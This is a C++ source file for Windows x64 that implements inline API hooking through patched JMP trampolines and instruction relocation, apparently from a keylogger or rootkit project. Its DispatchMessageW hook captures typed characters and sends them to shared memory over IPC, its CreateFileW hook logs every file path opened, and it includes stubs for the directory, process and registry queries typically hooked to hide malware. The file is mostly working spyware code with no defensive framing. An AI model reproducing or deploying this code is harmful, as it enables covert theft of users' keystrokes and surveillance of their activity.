#include "stdafx.h"
#include "hooking.h"
#include "hde64.h"
#include "ipc.h"

extern HANDLE hFile;
typedef int(*wsprintfW_ptr)(LPWSTR, LPCWSTR, ...);
typedef BOOL(*WriteFile_ptr)(HANDLE, LPCVOID, DWORD, LPDWORD, LPOVERLAPPED);
extern wsprintfW_ptr g_wsprintf;
DWORD g_dwWr;

WCHAR g_KbdBuf[32] = { 0 };

//get the memory address of the specified library function
LPVOID GetAPIAddress(LPWSTR pwszLibName, LPSTR pszFunctionName)
{
	HMODULE hMod = LoadLibrary(pwszLibName);
	if (hMod == NULL)
		return 0;

	LPVOID lpAddr = GetProcAddress(hMod, pszFunctionName);
	if (lpAddr == NULL)
		return 0;

	return lpAddr;
}

//hook a dll api
BOOL HookDLLFunction(LPTSTR lpDllName, 
					 LPSTR lpFuncName, 
					 BYTE *hook_add,
					 DWORD hook_len,
					 BYTE *data_add,
					 DWORD dwDataLen,
					 DWORD dwArgsNum)
{
	DWORD i=0;
	SIZE_T dummy;
	BYTE *reentry_point, *trampoline;
	BYTE *local_hook_add = NULL;
	BYTE *local_data_add = NULL;
	DWORD rewritten_bytes, dwWr;
	BYTE jmp_code[12] = { 0x48, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xE0 };

	PHOOKSTRUCT pHook = (PHOOKSTRUCT)data_add;

	//get the address of the dll
	pHook->APIAddr = GetAPIAddress(lpDllName, lpFuncName);
	if(!pHook->APIAddr)
		return 0;

	//get the address of some api
	pHook->wsprintfW_ptr = GetAPIAddress(L"user32.dll",		"wsprintfW");
	pHook->WriteFile_ptr = GetAPIAddress(L"kernel32.dll",	"WriteFile");
	pHook->hFile = hFile;

	//alloc memory for code and data
	BYTE *pHookCode = (BYTE*)VirtualAlloc(NULL, hook_len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	BYTE *pHookData = (BYTE*)VirtualAlloc(NULL, dwDataLen, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if(!pHookCode || !pHookData)
	{
		VirtualFree(pHookCode, 0, MEM_RELEASE);
		VirtualFree(pHookData, 0, MEM_RELEASE);
		return 0;
	}

	//alloc mem for the ipc write function	
	pHook->IPCFunc_Write = VirtualAlloc(NULL, 512, MEM_COMMIT, PAGE_EXECUTE_READWRITE);	
	memcpy(pHook->IPCFunc_Write, IPCWrite, 512);

	//select the callstub accordingly to the params number
	if (dwArgsNum < 4)
		memcpy(pHook->CallStub, CALLSTUB1, sizeof(pHook->CallStub));
	else
		memcpy(pHook->CallStub, CALLSTUB2, sizeof(pHook->CallStub));

	//search for the marker of hook function address (0x67)
	for(i=0; i < CODE_PATCH_LIMIT; i++)
	{
		if(pHook->CallStub[i] != 0x67)
			continue;

		//use the allocated memory
		//change the marker with the real address
		memcpy(&pHook->CallStub[i], &pHookCode, 8);

		//use the linked function
		//memcpy(&pHook->CallStub[i], &hook_add, 8);

		break;
	}

	//search for the marker of data address (0x69)
	//WriteFile(hFile, L"Apply patch 0x69\r\n", wcslen(L"Apply patch 0x69\r\n")*sizeof(WCHAR), &dwWr, NULL);
	for(i=0; i < CODE_PATCH_LIMIT; i++)
	{
		if(pHook->CallStub[i] != 0x69)
			continue;

		//change the marker with the real address
		memcpy(&pHook->CallStub[i], &pHookData, 8);
		break;
	}

	if(dwArgsNum >= 4)
	{
		//search for the marker of number of params (0x66)
		//WriteFile(hFile, L"Apply patch 0x66\r\n", wcslen(L"Apply patch 0x66\r\n")*sizeof(WCHAR), &dwWr, NULL);
		for(i=0; i < CODE_PATCH_LIMIT; i++)
		{
			if(pHook->CallStub[i] != 0x66)
				continue;

			//change the marker with the real address
			memcpy(&pHook->CallStub[i], &dwArgsNum, 4);
			break;
		}		
	}
	
	//get jmp instruction size	
	for (rewritten_bytes=0; rewritten_bytes<sizeof(jmp_code); rewritten_bytes+=GetInstructionLength_x64(((BYTE*)pHook->APIAddr)+rewritten_bytes, 64));

	//make a copy of the original api code	
	memcpy(pHook->OriginalCode, ORIGINALCODE, sizeof(pHook->OriginalCode));

	//reentry point in api
	reentry_point = ((BYTE*)pHook->APIAddr) + rewritten_bytes;

	//search for the marker of the original function address (0x68)	
	for(i=0; i < CODE_PATCH_LIMIT; i++)
	{		
		if(pHook->OriginalCode[i] != 0x68)
			continue;

		//change the marker with the real address
		memcpy(pHook->OriginalCode + i, &reentry_point, sizeof(reentry_point));
		break;
	}

	//modify che original code in my stub
	//memcpy(pHook->OriginalCode, pHook->APIAddr, rewritten_bytes);
	//copia il codice originale modificando eventuali jmp
	ModAsmCode((PBYTE)pHook->OriginalCode, (PBYTE)pHook->APIAddr);

	//copia il codice e i dati patchati
	memcpy(pHookCode, hook_add, hook_len);
	memcpy(pHookData, data_add, dwDataLen);

	// Sostituisce i primi byte della funzione da hookare con una JMP
	//trampoline = pHookData + sizeof(pHook->OriginalCode);	// Il call stub e' la seconda entry (punta al buffer CallStub)
	trampoline = pHook->CallStub;	// Il call stub e' la seconda entry (punta al buffer CallStub)
	memcpy(jmp_code + 2, &trampoline, 8);

	HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetCurrentProcessId());
	if(hProc)
	{
		WriteProcessMemory(hProc, (BYTE*)pHook->APIAddr, jmp_code, sizeof(jmp_code), &dummy);
		CloseHandle(hProc);

		return TRUE;
	}

	return FALSE;
}

//compute the length of the assembly instuctions (until the ret) opcode and return it
int ASMCode_Length(PBYTE pSource)
{
	hde64s	hs;
	int nLen = 0, i = 0;
	
	do
	{
		if((i = hde64_disasm(pSource, &hs)) > 0)
		{
			if(hs.opcode != 0xC3)
			{
				nLen += i;
				pSource += i;
			}
			else
				break;
		}
	}while(i > 0);

	return nLen;
}

//copy asm instructions from source to dest and return the length
int ASMCode_Copy(PBYTE pDest, PBYTE pSource, int nLen=0)
{
	if(!nLen)
	{
		//compute the length of the code to copy
		nLen = ASMCode_Length(pSource);
	}

	memcpy(pDest, pSource, nLen);

	return nLen;
}

//check asm code
int ModAsmCode(PBYTE pbOutCode, PBYTE lpCode)
{
	hde64s	hs;
	int		nCpy = 0;
	LPVOID  lpAddr = NULL;
	DWORD64	dwOffset;
	DWORD   dwWr = 0;

	//WriteFile(hFile, L"Code start\r\n", wcslen(L"Code start\r\n")*sizeof(WCHAR), &dwWr, NULL);
	//parse orig code
	for(int i=0, nLen=0; i<12; i+=nLen)
	{				
		//WriteFile(hFile, L"Disasming\r\n", wcslen(L"Disasming\r\n")*sizeof(WCHAR), &dwWr, NULL);
		//disasm the original code
		nLen = hde64_disasm(lpCode, &hs);

		//check op type
		switch(*lpCode)
		{
			case 0xE9:

				nCpy = ASMCode_Copy(pbOutCode, (PBYTE)MYJMP, 0);

				if(hs.imm.imm64 != 0)
				{
					//check for a valid 64 bit address
					dwOffset = hs.imm.imm64;
					if(hs.imm.imm64 == (DWORD64)hs.imm.imm32)
						if((long)hs.imm.imm32 < 0)
							dwOffset = hs.imm.imm64 | 0xFFFFFFFF00000000;
				}
				else
				{					
					dwOffset = hs.disp.disp32;
				}
				
				//relocated address
				lpAddr = (LPVOID)((DWORD64)lpCode + dwOffset + nLen);

				//search for the marker of hook function address (0x67)
				for(int j=0; i < 32; i++)
				{
					if(pbOutCode[i] != 0x67)
						continue;

					//change the marker with the real address					
					memcpy(&pbOutCode[i], &lpAddr, 8);
					
					break;
				}

				break;

			case 0xFF:

				if(hs.modrm == 0x25)
				{
					//jmp qword ptr[0xaddress]

					//ge the offset value
					dwOffset = hs.disp.disp32;	

					//compute the new address
					lpAddr = (LPVOID)((DWORD64)lpCode + dwOffset + nLen);

					//read the value from the new address (8 bytes for 64 bit)
					memcpy(&lpAddr, lpAddr, 8);

					nCpy = ASMCode_Copy(pbOutCode, (PBYTE)MYJMP, 0);
				}
										
				//search for the marker of hook function address (0x67)
				for(int j=0; i < 32; i++)
				{
					if(pbOutCode[i] != 0x67)
						continue;

					//change the marker with the real address					
					memcpy(&pbOutCode[i], &lpAddr, 8);
					
					break;
				}
				break;

			default:
				//WriteFile(hFile, L"Writing default\r\n", wcslen(L"Writing default\r\n")*sizeof(WCHAR), &g_dwWr, NULL);
				memcpy(pbOutCode, lpCode, nLen);
				nCpy = nLen;
				break;
		}

		lpCode		+= nLen;
		pbOutCode	+= nCpy;
	}

	return 1;
}


int ParseAsmCode(char* lpCode)
{
	hde64s hs;

	for(int i=0, nLen=0; i<16; i+=nLen)
	{
		nLen = hde64_disasm(lpCode, &hs);
		lpCode += nLen;
	}

	return 1;
}


//----------------------------------------------------------------------------------------------------------------------------------------
//------------------------- HOOK FUNCTION ------------------------------------------------------------------------------------------------
//----------------------------------------------------------------------------------------------------------------------------------------

HANDLE WINAPI H_CreateFileW(LPVOID data_param,
							LPCWSTR lpFileName,
							DWORD dwDesiredAccess,
							DWORD dwShareMode,
							LPSECURITY_ATTRIBUTES lpSecurityAttributes,
							DWORD dwCreationDisposition,
							DWORD dwFlagsAndAttributes,
							HANDLE hTemplateFile)
{
	CreateFileW_ptr pFunc = (CreateFileW_ptr)data_param;
	
	PHOOKSTRUCT pHook = (PHOOKSTRUCT)(data_param);
	WriteFile_ptr pWriteFile = (WriteFile_ptr)pHook->WriteFile_ptr;

	DWORD dwWr = 0;
	pWriteFile(pHook->hFile, lpFileName, wcslen(lpFileName)*sizeof(WCHAR), &dwWr, NULL);

	return pFunc(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes, dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile);
}

BOOL WINAPI H_DeleteFileW(LPVOID data_param, LPCWSTR lpFileName)
{
	DeleteFileW_ptr pFunc = (DeleteFileW_ptr)data_param;
	return pFunc(lpFileName);
}

LRESULT WINAPI H_DispatchMessageW(LPVOID data_param, const MSG* msg)
{
	DispatchMessageW_ptr pFunc = (DispatchMessageW_ptr)data_param;

	//WM_KEYDOWN message
	if (msg->message == 0x102)
	{
		WCHAR buf[64];
		WCHAR str[] = { L'%', L'c', L'\0' };
//		WCHAR str2[] = { L'%', L'c', L'%', L'c', L'\0' };
//		WCHAR str3[] = { L'%', L'0', L'2', L'X', L'\0' };
		WCHAR str4[] = { L'\r', L'\n', L'\0' };
		DWORD dwWr;
		IPC_DATA Ipc = { 0 };
		KBD_DATA Kbd = { 0 };

		PHOOKSTRUCT pHook = (PHOOKSTRUCT)(data_param);
		wsprintfW_ptr pWsprintf = (wsprintfW_ptr)pHook->wsprintfW_ptr;
		WriteFile_ptr pWriteFile = (WriteFile_ptr)pHook->WriteFile_ptr;

		//switch ((CHAR)msg->wParam)
		//{
		//	case 0x0D:
		//		//write to file
		//		pWriteFile(hFile, str4, wcslen(str4)*sizeof(WCHAR), &dwWr, NULL);
		//		break;

		//	default:
		//		//wsprintf
		//		pWsprintf(buf, str, (WCHAR)msg->wParam);
		//		//writefile
		//		pWriteFile(pHook->hFile, buf, wcslen(buf)*sizeof(WCHAR), &dwWr, NULL);
		//		
		//		//set keyboard data
		//		Kbd.Window  = msg->hwnd;
		//		Kbd.Message = msg->message;
		//		Kbd.WParam  = msg->wParam;
		//		Kbd.LParam  = msg->lParam;

		//		//set ipc data
		//		Ipc.Type   = IPC_DATA_KEYBOARD;
		//		Ipc.Length = sizeof(KBD_DATA);
		//		Ipc.Buffer = &Kbd;

		//		//write ipc data to shared memory
		//		IPCWrite(pHook->IPCBufferIn, &Ipc);

		//		break;
		//}

		//wsprintf
		//pWsprintf(buf, str, (WCHAR)msg->wParam);
		//writefile
		//pWriteFile(pHook->hFile, buf, wcslen(buf)*sizeof(WCHAR), &dwWr, NULL);
				
		//set keyboard data
		Kbd.Window  = msg->hwnd;
		Kbd.Message = msg->message;
		Kbd.WParam  = msg->wParam;
		Kbd.LParam  = msg->lParam;

		//set ipc data
		Ipc.Type		= IPC_DATA_KEYBOARD;
		Ipc.Length		= sizeof(Kbd);
		Ipc.Buffer		= &Kbd;
		Ipc.dwTimestamp = 0;		

		//pWriteFile(pHook->hFile, str4, wcslen(str4)*sizeof(WCHAR), &dwWr, NULL);

		//write ipc data to shared memory				
		pIPCWrite p = (pIPCWrite)(pHook->IPCFunc_Write);
		
		p(pHook->IPCBufferIn, &Ipc);
	}

	return pFunc(msg);
}

NTSTATUS H_NtEnumerateValueKey(LPVOID data_param, HANDLE KeyHandle, ULONG Index, KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass, PVOID KeyValueInformation, ULONG Length, PULONG ResultLength)
{
	NtEnumerateValueKey_ptr pFunc = (NtEnumerateValueKey_ptr)data_param;
	return pFunc(KeyHandle, Index, KeyValueInformationClass, KeyValueInformation, Length, ResultLength);
}

BOOL WINAPI H_GetMessageW(LPVOID data_param, LPMSG lpMsg, HWND hWnd, UINT wMsgFilterMin, UINT wMsgFilterMax, UINT wRemoveMsg)
{
	GetMessageW_ptr pFunc = (GetMessageW_ptr)data_param;
	return pFunc(lpMsg, hWnd, wMsgFilterMin, wMsgFilterMax, wRemoveMsg);
}

BOOL WINAPI H_MoveFileW(LPVOID data_param, LPCWSTR lpOldFile, LPCWSTR lpNewFile)
{
	MoveFileW_ptr pFunc = (MoveFileW_ptr)data_param;
	return pFunc(lpOldFile, lpNewFile);
}

NTSTATUS H_NtQueryKey(LPVOID data_param, HANDLE KeyHandle, KEY_INFORMATION_CLASS KeyInformationClass, PVOID KeyInformation, ULONG Length, PULONG ResultLength)
{
	NtQueryKey_ptr pFunc = (NtQueryKey_ptr)data_param;
	return pFunc(KeyHandle, KeyInformationClass, KeyInformation, Length, ResultLength);
}

NTSTATUS H_NtQuerySystemInformation(LPVOID data_param, PROCESSINFOCLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength)
{
	NtQuerySystemInformation_ptr pFunc = (NtQuerySystemInformation_ptr)data_param;
	return pFunc(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength);
}

BOOL WINAPI H_PeekMessageW(LPVOID data_param, LPMSG lpMsg, HWND hWnd, UINT wMsgFilterMin, UINT wMsgFilterMax, UINT wRemoveMsg)
{
	PeekMessageW_ptr pFunc = (PeekMessageW_ptr)data_param;
	return pFunc(lpMsg, hWnd, wMsgFilterMin, wMsgFilterMax, wRemoveMsg);
}

NTSTATUS H_NtQueryDirectoryFile(LPVOID data_param, HANDLE FileHandle, HANDLE Event, LPVOID ApcRoutine, PVOID ApcContext, PIO_STATUS_BLOCK IoStatusBlock, PVOID FileInformation, ULONG Length, FILE_INFORMATION_CLASS FileInformationClass, BOOLEAN ReturnSingleEntry, PUNICODE_STRING FileName, BOOLEAN RestartScan)
{
	NtQueryDirectoryFile_ptr pFunc = (NtQueryDirectoryFile_ptr)data_param;
	return pFunc(FileHandle, Event, ApcRoutine, ApcContext, IoStatusBlock, FileInformation, Length, FileInformationClass, ReturnSingleEntry, FileName, RestartScan);
}